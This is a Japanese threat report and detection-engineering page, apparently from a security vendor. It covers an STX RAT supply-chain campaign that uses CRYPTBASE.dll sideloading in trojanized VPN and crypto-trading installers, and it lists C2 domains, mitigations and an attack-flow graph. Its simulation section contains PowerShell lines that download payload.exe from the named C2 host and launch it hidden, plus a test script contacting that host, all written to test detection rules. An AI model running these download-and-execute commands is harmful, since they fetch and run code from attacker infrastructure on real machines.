フォローする 
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
研究者は、脅威アクターが悪意のあるDLLサイドローディングを使用したアクティブなサプライチェーンキャンペーンを発見しました CRYPTBASE.dll を利用して、暗号通貨取引ソフトウェアとX-VPNクライアント用のトロイの木馬化されたインストーラーを通じてSTX RATリモートアクセス型トロイの木馬を展開しました。この操作は、1つのBitbucketリポジトリを依存して感染したパッケージを配布し、 supp0v3.com のルート下でC2ドメインを回転させました。金融取引ツールユーザーと広く使われているVPNサービスの両方を対象とすることで、攻撃者は認証情報や他の機密データの大規模な盗難を狙って位置付けました。共通のサイドローディング方法と共通インフラストラクチャをカバーするために、検出コンテンツが更新されました。
調査
分析者は、すべてが同じ CRYPTBASE.dll サイドローディングチェーンを使用してSTX RATをメモリに直接ロードする11の悪意のあるパッケージを特定しました。トロイの木馬化されたインストーラーは、 amos-tradingという名前のBitbucketリポジトリにホストされており、コミットメタデータはその活動をエイリアス Leda Elacoateに関連付けました。公開されると、運営者はインフラストラクチャを helloworld.supp0v3.com to welcome.supp0v3.comに回転させました。YARA分析により、すべてのサンプルでSTX RATが最終的なペイロードであることが確認されました。
緩和策
X-VPNはWindowsバージョン 77.5.3でこの問題に対処し、システムディレクトリからの厳しいDLLローディングを実施し、スタートアップタイムにDLLハッシュ検証を行い、プロセスごとのローディングポリシーを適用しました。ネットワークの周辺で supp0v3.com およびそのサブドメインをブロックすることで、コマンド&コントロールトラフィックを妨害できます。組織はまた、ソフトウェアダウンロードの衛生を強化し、検証済みのベンダーソースにインストールを制限するべきです。
対応
ディフェンダーは、システムパス外から CRYPTBASE.dll をロードするプロセスにアラートを出し、メモリ上でのSTX RAT実行の兆候を調査するべきです。公開されたSTX RAT YARAルールをEDRプラットフォーム全体に展開し、 supp0v3.com へのアウトバウンドHTTPSトラフィックを注意深く監視する必要があります。すべてのエンドポイントはパッチ済みのX-VPNバージョンに更新されるか、脆弱なソフトウェアを削除すべきです。また、脅威ハンティングは反射的コードロードの動作と関連するマルウェアの多段解凍チェーンに集中するべきです。
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["<b>技術</b> – <b>T1195.002 サプライチェーンの妥協: ソフトウェア供給チェーンの妥協</b><br/><b>説明</b>: 攻撃者がBitbucketリポジトリにホストされた正規のインストーラーに悪意のあるCRYPTBASE.dllを注入しました。"] class tech_supply_chain technique dll_cryptbase["<b>ファイル</b> – <b>名前</b>: CRYPTBASE.dll (悪意あり)"] class dll_cryptbase file file_installer["<b>ファイル</b> – <b>名前</b>: トロイの木馬化されたインストーラー (例: Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["<b>技術</b> – <b>T1204.002 ユーザー実行: 悪意のあるファイル</b><br/><b>説明</b>: 被害者がトロイの木馬化されたインストーラーをダウンロードして実行します。"] class tech_user_exec technique tech_masquerade["<b>技術</b> – <b>T1036.008 偽装: ファイルタイプの偽装</b><br/><b>説明</b>: 悪意のあるパッケージが正当なVPNまたは暗号u2011トレーディングインストーラーとして提示されます。"] class tech_masquerade technique tech_dll_hijack["<b>技術</b> – <b>T1574.001 実行フローのハイジャック: DLL</b><br/><b>説明</b>: インストーラーはプログラムディレクトリに配置されたCRYPTBASE.dllをロードし、正規のアプリケーションが悪意のあるDLLをロードする原因になります。"] class tech_dll_hijack technique tech_path_intercept["<b>技術</b> – <b>T1574.008 パスインターセプション: サーチオーダーハイジャック</b><br/><b>説明</b>: Windows DLLのサーチオーダーにより、システムコピーよりも先に攻撃者のDLLがロードされます。"] class tech_path_intercept technique tech_reflective["<b>技術</b> – <b>T1620 反射コードローディング</b><br/><b>説明</b>: 悪意のあるDLLは、反射的なローディングを使用してメモリ内にSTX RATペイロードを解凍・注入し、オンディスクのアーティファクトを残しません。"] class tech_reflective technique tech_embedded["<b>技術</b> – <b>T1027.009 組み込みペイロード</b><br/><b>説明</b>: DLLには、組み込みの多u2011ステージ解凍チェーンとSTX RATコアが含まれています。"] class tech_embedded technique malware_STX["<b>マルウェア</b> – <b>名前</b>: STX RAT<br/><b>機能</b>: 認証情報の盗難とデータの流出を可能にするリモートアクセス型トロイの木馬。"] class malware_STX malware tech_c2["<b>技術</b> – <b>T1071.001 アプリケーションレイヤープロトコル: ウェブプロトコル</b><br/><b>説明</b>: RATはHTTPSを介してC2に通信し、supp0v3.comのサブドメインに接続します。"] class tech_c2 technique tech_cred_browser["<b>技術</b> – <b>T1555.003 ウェブブラウザからの認証情報</b><br/><b>説明</b>: STX RATは保存されたブラウザの認証情報、セッショントークン、システムアカウントデータを収集します。"] class tech_cred_browser technique tech_exfil["<b>技術</b> – <b>T1041 C2チャネルを介した流出</b><br/><b>説明</b>: 収集された認証情報とシステムデータは同じHTTPS C2チャネルを介して流出されます。"] class tech_exfil technique %% Connections tech_supply_chain –>|injects| dll_cryptbase dll_cryptbase –>|placed in| file_installer file_installer –>|downloaded and executed by victim| tech_user_exec tech_user_exec –>|leads to| tech_masquerade tech_masquerade –>|enables| tech_dll_hijack tech_dll_hijack –>|uses| tech_path_intercept tech_path_intercept –>|allows| tech_reflective tech_reflective –>|loads| malware_STX malware_STX –>|uses| tech_embedded malware_STX –>|communicates via| tech_c2 malware_STX –>|harvests| tech_cred_browser tech_cred_browser –>|data exfiltrated via| tech_exfil "
攻撃フロー
シミュレーション実行
前提条件:テレメトリーとベースラインのプレフライトチェックが合格する必要があります。
合理性:このセクションは、検出ルールをトリガーするよう設計された敵対的技術(TTP)の正確な実行を詳述しています。コマンドとストーリーは、識別されたTTPを直接反映し、検出ロジックで期待される正確なテレメトリーを生成することを目指します。
-
攻撃の流れとコマンド:
低権限ユーザーアカウントを侵害した攻撃者は、C2サーバーから悪意のあるペイロードをダウンロードするためにPowerShellワンライナーを使用します
helloworld.supp0v3.com。これは、 T1071.001 (ウェブプロトコルC2)と T1204.002 (ユーザー実行)を利用し、ペイロード自体は難読化されています(T1027, T1027.009)し、正規の実行可能ファイルとして偽装されています(T1036.005/008)。マルウェアのドメインへのアウトバウンド接続はファイアウォールログで捕捉され、結果としてSigmaルールが発火するはずです。# Supp0v3 C2ドメインから悪意のあるペイロードをダウンロード $url = "http://helloworld.supp0v3.com/payload.exe" $out = "$env:TEMPpayload.exe" Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out # ペイロードを実行 (シミュレーション – 実際はダミーファイルを作成するだけ) Start-Process -FilePath $out -WindowStyle Hidden -
リグレッションテストスクリプト:
# TC-20260609-A1B2C – helloworld.supp0v3.comへのSTX RAT C2接続をシミュレート try { # ステップ1:ダミーペイロードを準備(実際のマルウェア実行を避ける) $payloadPath = "$env:TEMPpayload.exe" Set-Content -Path $payloadPath -Value "This is a dummy executable for testing." -Encoding ASCII # ステップ2:悪意のあるドメインへのアウトバウンドHTTPリクエストをシミュレート $c2Url = "http://helloworld.supp0v3.com/payload.exe" Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath # ステップ3:「実行」ペイロード(安全のために実際の実行は行わない) Write-Host "$payloadPathでのペイロードのシミュレーション実行" Write-Host "シミュレーション完了 – SIEMでのアラートを確認してください。" } catch { Write-Error "シミュレーション失敗: $_" } -
クリーンアップコマンド:
# ダミーペイロードと残留ファイルを削除 $payloadPath = "$env:TEMPpayload.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "ペイロードファイルをクリーンアップしました。" } else { Write-Host "ペイロードファイルが見つかりません – クリーンアップの必要はありません。" }